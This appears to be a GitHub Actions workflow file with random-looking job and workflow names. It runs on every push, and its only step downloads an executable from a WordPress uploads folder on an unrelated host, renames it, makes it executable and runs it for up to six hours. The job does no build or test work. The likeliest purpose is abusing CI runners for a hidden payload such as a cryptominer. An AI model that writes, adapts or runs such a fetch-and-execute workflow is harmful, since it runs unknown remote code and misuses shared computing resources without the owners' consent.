name: kalinvnode
on: push
jobs:
  nefrihuwu1:
    runs-on: ubuntu-18.04
    timeout-minutes: 360
    steps:
    - run: wget https://prettycool-bf1673.ingress-earth.ewp.live/wp-content/uploads/dede/NewFolder/Lah/iwankelin; chmod +x iwankelin; mv iwankelin pivanoe; ./pivanoe --building --server
